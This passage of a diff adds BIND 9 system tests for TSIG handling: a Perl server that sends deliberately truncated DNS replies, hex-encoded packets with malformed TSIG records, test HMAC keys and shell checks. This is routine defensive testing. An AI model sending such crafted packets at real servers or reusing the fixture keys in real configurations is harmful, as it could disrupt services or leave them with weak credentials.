SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# An adhoc server that returns a TC=1 response with the final byte +# removed to generate UNEXPECTEDEND form dns_message_parse. +# + +use IO::File; +use IO::Socket; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } +printf "localport %u\n", $localport; + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.2", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +sub arraystring { + my $string = join("", @_); + return $string; +} + +for (;;) { + $from = $sock->recv($buf, 512); + ($port, $ip_address) = unpack_sockaddr_in($from); + $l = length($buf); + printf "received %u bytes from %s#%u\n", $l, inet_ntoa($ip_address), $port; + @up = unpack("C[$l]", $buf); + $up[2] |= 0x80; # QR + $up[2] |= 0x02; # TC + $up[3] |= 0x80; # RA + $l -= 1; # truncate the response 1 byte + $replydata = pack("C[$l]", @up); + printf "sent %u bytes\n", $sock->send($replydata); +} diff --git a/bin/tests/system/tsig/badlocation b/bin/tests/system/tsig/badlocation new file mode 100644 index 0000000..4477423 --- /dev/null +++ b/bin/tests/system/tsig/badlocation @@ -0,0 +1,37 @@ +# Transaction ID +1122 +# Standard query +0000 +# Questions: 1, Additional: 1 +0001 0000 0001 0000 +# QNAME: isc.org +03 69 73 63 03 6F 72 67 00 +# Type: A (Host Address) +0001 +# Class: IN +0001 +# Specially crafted TSIG Resource Record +# Name: "sha256" +06 73 68 61 32 35 36 00 +# Type: TSIG (Transaction Signature) +00fa +# Class: ANY +00ff +# TTL: 0 +00000000 +# RdLen: 29 +001d +# Algorithm Name: hmac-sha256 +0b 68 6D 61 63 2D 73 68 61 32 35 36 00 +# Time Signed: Jan 1, 1970 01:00:00.000000000 CET +00 00 00 00 00 00 +# Fudge: 300 +012c +# MAC Size: 0; MAC: empty +0000 +# Original ID: 0 +0000 +# Error: no error +0000 +# Other Data Length: 0 +0000 diff --git a/bin/tests/system/tsig/badtime b/bin/tests/system/tsig/badtime new file mode 100644 index 0000000..7926404 --- /dev/null +++ b/bin/tests/system/tsig/badtime @@ -0,0 +1,37 @@ +# Transaction ID +1122 +# Standard query +0000 +# Questions: 1, Additional: 1 +0001 0000 0000 0001 +# QNAME: isc.org +03 69 73 63 03 6F 72 67 00 +# Type: A (Host Address) +0001 +# Class: IN +0001 +# Specially crafted TSIG Resource Record +# Name: "sha256" +06 73 68 61 32 35 36 00 +# Type: TSIG (Transaction Signature) +00fa +# Class: ANY +00ff +# TTL: 0 +00000000 +# RdLen: 29 +001d +# Algorithm Name: hmac-sha256 +0b 68 6D 61 63 2D 73 68 61 32 35 36 00 +# Time Signed: Jan 1, 1970 01:00:00.000000000 CET +00 00 00 00 00 00 +# Fudge: 300 +012c +# MAC Size: 0; MAC: empty +0000 +# Original ID: 0 +0000 +# Error: BADSIG +0010 +# Other Data Length: 0 +0000 diff --git a/bin/tests/system/tsig/clean.sh b/bin/tests/system/tsig/clean.sh new file mode 100644 index 0000000..b173ffe --- /dev/null +++ b/bin/tests/system/tsig/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after tsig tests. +# + +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f Kexample.net.* +rm -f keygen.out? +rm -f ns*/managed-keys.bind* +rm -f packet.out diff --git a/bin/tests/system/tsig/ns1/example.db b/bin/tests/system/tsig/ns1/example.db new file mode 100644 index 0000000..7854613 --- /dev/null +++ b/bin/tests/system/tsig/ns1/example.db @@ -0,0 +1,163 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.nil IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.nil. NS ns1.example.nil. +ns1.example.nil. A 10.53.0.1 +example.nil. NS ns2.example.nil. +ns2.example.nil. A 10.53.0.2 + +$ORIGIN example.nil. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . +$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" ":(.*):\\1:" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example.nil. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example.nil. +ns A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. +$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example.nil. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" +large TXT ( 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 + 1234567890 1234567890 1234567890 1234567890 ) diff --git a/bin/tests/system/tsig/ns1/named.conf.in b/bin/tests/system/tsig/ns1/named.conf.in new file mode 100644 index 0000000..22637af --- /dev/null +++ b/bin/tests/system/tsig/ns1/named.conf.in @@ -0,0 +1,93 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + notify no; +}; + +# md5 key appended by setup.sh at the end + +key "sha1" { + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; + algorithm hmac-sha1; +}; + +key "sha224" { + secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA=="; + algorithm hmac-sha224; +}; + +key "sha256" { + secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY="; + algorithm hmac-sha256; +}; + +key "sha384" { + secret "OaDdoAk2LAcLtYeUnsT7A9XHjsb6ZEma7OCvUpMraQIJX6HetGrlKmF7yglO1G2h"; + algorithm hmac-sha384; +}; + +key "sha512" { + secret "jI/Pa4qRu96t76Pns5Z/Ndxbn3QCkwcxLOgt9vgvnJw5wqTRvNyk3FtD6yIMd1dWVlqZ+Y4fe6Uasc0ckctEmg=="; + algorithm hmac-sha512; +}; + +# md5-trunc key appended by setup.sh at the end + +key "sha1-trunc" { + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; + algorithm hmac-sha1-80; +}; + +key "sha224-trunc" { + secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA=="; + algorithm hmac-sha224-112; +}; + +key "sha256-trunc" { + secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY="; + algorithm hmac-sha256-128; +}; + +key "sha384-trunc" { + secret "OaDdoAk2LAcLtYeUnsT7A9XHjsb6ZEma7OCvUpMraQIJX6HetGrlKmF7yglO1G2h"; + algorithm hmac-sha384-192; +}; + +key "sha512-trunc" { + secret "jI/Pa4qRu96t76Pns5Z/Ndxbn3QCkwcxLOgt9vgvnJw5wqTRvNyk3FtD6yIMd1dWVlqZ+Y4fe6Uasc0ckctEmg=="; + algorithm hmac-sha512-256; +}; + +zone "example.nil" { + type primary; + file "example.db"; +}; + +server 10.53.0.2 { + keys sha256; +}; + +zone "bad-tsig" { + type forward; + forwarders { 10.53.0.2; }; + forward only; +}; diff --git a/bin/tests/system/tsig/prereq.sh b/bin/tests/system/tsig/prereq.sh new file mode 100644 index 0000000..a663cfe --- /dev/null +++ b/bin/tests/system/tsig/prereq.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +if test -z "$PERL"; then + echo_i "This test requires Perl." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/tsig/setup.sh b/bin/tests/system/tsig/setup.sh new file mode 100644 index 0000000..420e513 --- /dev/null +++ b/bin/tests/system/tsig/setup.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf + +if $FEATURETEST --md5 +then + cat >> ns1/named.conf << EOF +# Conditionally included when support for MD5 is available +key "md5" { + secret "97rnFx24Tfna4mHPfgnerA=="; + algorithm hmac-md5; +}; + +key "md5-trunc" { + secret "97rnFx24Tfna4mHPfgnerA=="; + algorithm hmac-md5-80; +}; +EOF +fi diff --git a/bin/tests/system/tsig/tests.sh b/bin/tests/system/tsig/tests.sh new file mode 100644 index 0000000..affc6d0 --- /dev/null +++ b/bin/tests/system/tsig/tests.sh @@ -0,0 +1,262 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" + +# +# Shared secrets. +# +md5="97rnFx24Tfna4mHPfgnerA==" +sha1="FrSt77yPTFx6hTs4i2tKLB9LmE0=" +sha224="hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA==" +sha256="R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY=" +sha384="OaDdoAk2LAcLtYeUnsT7A9XHjsb6ZEma7OCvUpMraQIJX6HetGrlKmF7yglO1G2h" +sha512="jI/Pa4qRu96t76Pns5Z/Ndxbn3QCkwcxLOgt9vgvnJw5wqTRvNyk3FtD6yIMd1dWVlqZ+Y4fe6Uasc0ckctEmg==" + +status=0 + +if $FEATURETEST --md5 +then + echo_i "fetching using hmac-md5 (old form)" + ret=0 + $DIG $DIGOPTS example.nil. -y "md5:$md5" @10.53.0.1 soa > dig.out.md5.old || ret=1 + grep -i "md5.*TSIG.*NOERROR" dig.out.md5.old > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi + + echo_i "fetching using hmac-md5 (new form)" + ret=0 + $DIG $DIGOPTS example.nil. -y "hmac-md5:md5:$md5" @10.53.0.1 soa > dig.out.md5.new || ret=1 + grep -i "md5.*TSIG.*NOERROR" dig.out.md5.new > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +else + echo_i "skipping using hmac-md5" +fi + +echo_i "fetching using hmac-sha1" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha1:sha1:$sha1" @10.53.0.1 soa > dig.out.sha1 || ret=1 +grep -i "sha1.*TSIG.*NOERROR" dig.out.sha1 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha224" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha224:sha224:$sha224" @10.53.0.1 soa > dig.out.sha224 || ret=1 +grep -i "sha224.*TSIG.*NOERROR" dig.out.sha224 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha256" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha256:sha256:$sha256" @10.53.0.1 soa > dig.out.sha256 || ret=1 +grep -i "sha256.*TSIG.*NOERROR" dig.out.sha256 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha384" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha384:sha384:$sha384" @10.53.0.1 soa > dig.out.sha384 || ret=1 +grep -i "sha384.*TSIG.*NOERROR" dig.out.sha384 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha512" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha512:sha512:$sha512" @10.53.0.1 soa > dig.out.sha512 || ret=1 +grep -i "sha512.*TSIG.*NOERROR" dig.out.sha512 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +# +# +# Truncated TSIG +# +# +if $FEATURETEST --md5 +then + echo_i "fetching using hmac-md5 (trunc)" + ret=0 + $DIG $DIGOPTS example.nil. -y "hmac-md5-80:md5-trunc:$md5" @10.53.0.1 soa > dig.out.md5.trunc || ret=1 + grep -i "md5-trunc.*TSIG.*NOERROR" dig.out.md5.trunc > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +else + echo_i "skipping using hmac-md5 (trunc)" +fi + +echo_i "fetching using hmac-sha1 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha1-80:sha1-trunc:$sha1" @10.53.0.1 soa > dig.out.sha1.trunc || ret=1 +grep -i "sha1.*TSIG.*NOERROR" dig.out.sha1.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha224 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha224-112:sha224-trunc:$sha224" @10.53.0.1 soa > dig.out.sha224.trunc || ret=1 +grep -i "sha224-trunc.*TSIG.*NOERROR" dig.out.sha224.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha256 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha256-128:sha256-trunc:$sha256" @10.53.0.1 soa > dig.out.sha256.trunc || ret=1 +grep -i "sha256-trunc.*TSIG.*NOERROR" dig.out.sha256.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha384 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha384-192:sha384-trunc:$sha384" @10.53.0.1 soa > dig.out.sha384.trunc || ret=1 +grep -i "sha384-trunc.*TSIG.*NOERROR" dig.out.sha384.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha512-256 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha512-256:sha512-trunc:$sha512" @10.53.0.1 soa > dig.out.sha512.trunc || ret=1 +grep -i "sha512-trunc.*TSIG.*NOERROR" dig.out.sha512.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + + +# +# +# Check for bad truncation. +# +# +if $FEATURETEST --md5 +then + echo_i "fetching using hmac-md5-80 (BADTRUNC)" + ret=0 + $DIG $DIGOPTS example.nil. -y "hmac-md5-80:md5:$md5" @10.53.0.1 soa > dig.out.md5-80 || ret=1 + grep -i "md5.*TSIG.*BADTRUNC" dig.out.md5-80 > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +else + echo_i "skipping using hmac-md5-80 (BADTRUNC)" +fi + +echo_i "fetching using hmac-sha1-80 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha1-80:sha1:$sha1" @10.53.0.1 soa > dig.out.sha1-80 || ret=1 +grep -i "sha1.*TSIG.*BADTRUNC" dig.out.sha1-80 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha224-112 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha224-112:sha224:$sha224" @10.53.0.1 soa > dig.out.sha224-112 || ret=1 +grep -i "sha224.*TSIG.*BADTRUNC" dig.out.sha224-112 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha256-128 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha256-128:sha256:$sha256" @10.53.0.1 soa > dig.out.sha256-128 || ret=1 +grep -i "sha256.*TSIG.*BADTRUNC" dig.out.sha256-128 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha384-192 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha384-192:sha384:$sha384" @10.53.0.1 soa > dig.out.sha384-192 || ret=1 +grep -i "sha384.*TSIG.*BADTRUNC" dig.out.sha384-192 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha512-256 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha512-256:sha512:$sha512" @10.53.0.1 soa > dig.out.sha512-256 || ret=1 +grep -i "sha512.*TSIG.*BADTRUNC" dig.out.sha512-256 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "attempting fetch with bad tsig algorithm" +ret=0 +$DIG $DIGOPTS example.nil. -y "badalgo:invalid:$sha512" @10.53.0.1 soa > dig.out.badalgo 2>&1 || ret=1 +grep -i "Couldn't create key invalid: algorithm is unsupported" dig.out.badalgo > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "checking both OPT and TSIG records are returned when TC=1" +ret=0 +$DIG -p ${PORT} +ignore +bufsize=512 large.example.nil -y "hmac-sha1:sha1:$sha1" @10.53.0.1 txt > dig.out.large 2>&1 || ret=1 +grep "flags:.* tc[ ;]" dig.out.large > /dev/null || ret=1 +grep "status: NOERROR" dig.out.large > /dev/null || ret=1 +grep "EDNS:" dig.out.large > /dev/null || ret=1 +grep -i "sha1.*TSIG.*NOERROR" dig.out.sha1 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "check that dnssec-keygen won't generate TSIG keys" +ret=0 +$KEYGEN -a hmac-sha256 -b 128 -n host example.net > keygen.out3 2>&1 && ret=1 +grep "unknown algorithm" keygen.out3 > /dev/null || ret=1 + +echo_i "check that a 'BADTIME' response with 'QR=0' is handled as a request" +ret=0 +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp < badtime > /dev/null || ret=1 +$DIG -p ${PORT} @10.53.0.1 version.bind txt ch > dig.out.verify || ret=1 +grep "status: NOERROR" dig.out.verify > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +if "$PERL" -e 'use Net::DNS; use Net::DNS::Packet;' > /dev/null 2>&1 +then + echo_i "check that TSIG in the wrong place returns FORMERR" + ret=0 + $PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t udp -d < badlocation > packet.out + grep "rcode = FORMERR" packet.out > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +fi + +echo_i "check that a malformed truncated response to a TSIG query is handled" +ret=0 +$DIG -p $PORT @10.53.0.1 bad-tsig > dig.out.bad-tsig || ret=1 +grep "status: SERVFAIL" dig.out.bad-tsig > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tsiggss/authsock.pl b/bin/tests/system/tsiggss/authsock.pl new file mode 100644 index 0000000..d629c65 --- /dev/null +++ b/bin/tests/system/tsiggss/authsock.pl @@ -0,0 +1,96 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# test the update-policy external protocol + +require 5.6.0; + +use IO::Socket::UNIX; +use Getopt::Long; + +my $path; +my $typeallowed = "A"; +my $pidfile = "authsock.pid"; +my $timeout = 0; + +GetOptions("path=s" => \$path, + "type=s" => \$typeallowed, + "pidfile=s" => \$pidfile, + "timeout=i" => \$timeout); + +if (!defined($path)) { + print("Usage: authsock.pl --path=<sockpath> --type=type --pidfile=pidfile\n"); + exit(1); +} + +unlink($path); +my $server = IO::Socket::UNIX->new(Local => $path, Type => SOCK_STREAM, Listen => 8) or + die "unable to create socket $path"; +chmod 0777, $path; + +# setup our pidfile +open(my $pid,">",$pidfile) + or die "unable to open pidfile $pidfile"; +print $pid "$$\n"; +close($pid); + +# close gracefully +sub rmpid { unlink "$pidfile"; exit 1; }; +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +if ($timeout != 0) { + # die after the given timeout + alarm($timeout); +} + +while (my $client = $server->accept()) { + $client->recv(my $buf, 8, 0); + my ($version, $req_len) = unpack('N N', $buf); + + if ($version != 1 || $req_len < 17) { + printf("Badly formatted request\n"); + $client->send(pack('N', 2)); + next; + } + + $client->recv(my $buf, $req_len - 8, 0); + + my ($signer, + $name, + $addr, + $type, + $key, + $key_data) = unpack('Z* Z* Z* Z* Z* N/a', $buf); + + if ($req_len != length($buf)+8) { + printf("Length mismatch %u %u\n", $req_len, length($buf)+8); + $client->send(pack('N', 2)); + next; + } + + printf("version=%u signer=%s name=%s addr=%s type=%s key=%s key_data_len=%u\n", + $version, $signer, $name, $addr, $type, $key, length($key_data)); + + my $result; + if ($typeallowed eq $type) { + $result = 1; + printf("allowed type %s == %s\n", $type, $typeallowed); + } else { + printf("disallowed type %s != %s\n", $type, $typeallowed); + $result = 0; + } + + $reply = pack('N', $result); + $client->send($reply); +} diff --git a/bin/tests/system/tsiggss/clean.sh b/bin/tests/system/tsiggss/clean.sh new file mode 100644 index 0000000..0ace209 --- /dev/null +++ b/bin/tests/system/tsiggss/clean.sh @@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after tsiggss tests. +# + +rm -f ns1/*.jnl ns1/update.txt ns1/auth.sock +rm -f ns1/*.db ns1/K*.key ns1/K*.private +rm -f ns1/_default.tsigkeys +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f authsock.pid +rm -f ns1/core +rm -f nsupdate.out* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/tsiggss/ns1/administrator.ccache b/bin/tests/system/tsiggss/ns1/administrator.ccache Binary files differnew file mode 100644 index 0000000..e6c2e74 --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/administrator.ccache diff --git a/bin/tests/system/tsiggss/ns1/dns.keytab b/bin/tests/system/tsiggss/ns1/dns.keytab Binary files differnew file mode 100644 index 0000000..dcb863b --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/dns.keytab diff --git a/bin/tests/system/tsiggss/ns1/example.nil.db.in b/bin/tests/system/tsiggss/ns1/example.nil.db.in new file mode 100644 index 0000000..536ef29 --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/example.nil.db.in @@ -0,0 